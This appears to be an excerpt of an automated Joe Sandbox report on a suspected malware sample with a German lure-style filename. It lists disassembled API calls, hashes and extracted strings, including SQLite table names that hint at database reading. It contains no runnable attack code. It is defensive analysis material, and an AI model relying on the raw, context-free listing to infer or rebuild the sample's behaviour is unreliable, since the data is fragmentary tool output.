                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID:
                                                            • API String ID: 1865533344-0
                                                            • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                            • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                            • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                            • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                            APIs
                                                            • memset.MSVCRT ref: 004144E7
                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                            • memset.MSVCRT ref: 0041451A
                                                            • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                            • String ID:
                                                            • API String ID: 1127616056-0
                                                            • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                            • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                            • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                            • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                            • memset.MSVCRT ref: 0042FED3
                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: sqlite_master
                                                            • API String ID: 438689982-3163232059
                                                            APIs
                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                            • String ID:
                                                            • API String ID: 3917621476-0
                                                            APIs
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                            • wcscat.MSVCRT ref: 0041101F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                            • String ID:
                                                            • API String ID: 822687973-0
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75D4DF80,?,0041755F,?), ref: 00417452
                                                            • malloc.MSVCRT ref: 00417459
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,75D4DF80,?,0041755F,?), ref: 00417478
                                                            • free.MSVCRT ref: 0041747F
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$freemalloc
                                                            • String ID:
                                                            • API String ID: 2605342592-0
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                            • RegisterClassW.USER32(00000001), ref: 00412428
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                            • String ID:
                                                            • API String ID: 2678498856-0
                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item
                                                            • String ID:
                                                            • API String ID: 3888421826-0
                                                            APIs
                                                            • memset.MSVCRT ref: 00417B7B
                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                            • String ID:
                                                            • API String ID: 3727323765-0
                                                            APIs
                                                            • memset.MSVCRT ref: 0040F673
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                            • strlen.MSVCRT ref: 0040F6A2
                                                            • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            APIs
                                                            • memset.MSVCRT ref: 0040F6E2
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                            • strlen.MSVCRT ref: 0040F70D
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            APIs
                                                            • memset.MSVCRT ref: 00402FD7
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                            • strlen.MSVCRT ref: 00403006
                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                            • String ID:
                                                            • API String ID: 2754987064-0
                                                            APIs
                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                            • String ID:
                                                            • API String ID: 764393265-0
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Time$System$File$LocalSpecific
                                                            • String ID:
                                                            • API String ID: 979780441-0
                                                            APIs
                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$DialogHandleModuleParam
                                                            • String ID:
                                                            • API String ID: 1386444988-0
                                                            APIs
                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: InvalidateMessageRectSend
                                                            • String ID: d=E
                                                            • API String ID: 909852535-3703654223
                                                            APIs
                                                            • wcschr.MSVCRT ref: 0040F79E
                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcschr$memcpywcslen
                                                            • String ID: "
                                                            • API String ID: 1983396471-123907689
                                                            • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                            • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                            APIs
                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                            • _memicmp.MSVCRT ref: 0040C00D
                                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer_memicmpmemcpy
                                                            • String ID: URL
                                                            • API String ID: 2108176848-3574463123
                                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                            APIs
                                                            • _snwprintf.MSVCRT ref: 0040A398
                                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintfmemcpy
                                                            • String ID: %2.2X
                                                            • API String ID: 2789212964-323797159
                                                            • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                            • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf
                                                            • String ID: %%-%d.%ds
                                                            • API String ID: 3988819677-2008345750
                                                            • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                            • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                            APIs
                                                            • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                            • memset.MSVCRT ref: 00401917
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PlacementWindowmemset
                                                            • String ID: WinPos
                                                            • API String ID: 4036792311-2823255486
                                                            • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                            • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                            APIs
                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                                            • wcscat.MSVCRT ref: 0040DCFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamewcscatwcsrchr
                                                            • String ID: _lng.ini
                                                            • API String ID: 383090722-1948609170
                                                            • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                            • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                            • API String ID: 2773794195-880857682
                                                            • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                            • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                            • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID: MZ@
                                                            • API String ID: 1378638983-2978689999
                                                            • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                            • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                            • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                            • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                            • memset.MSVCRT ref: 0042BAAE
                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                            • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                            APIs
                                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
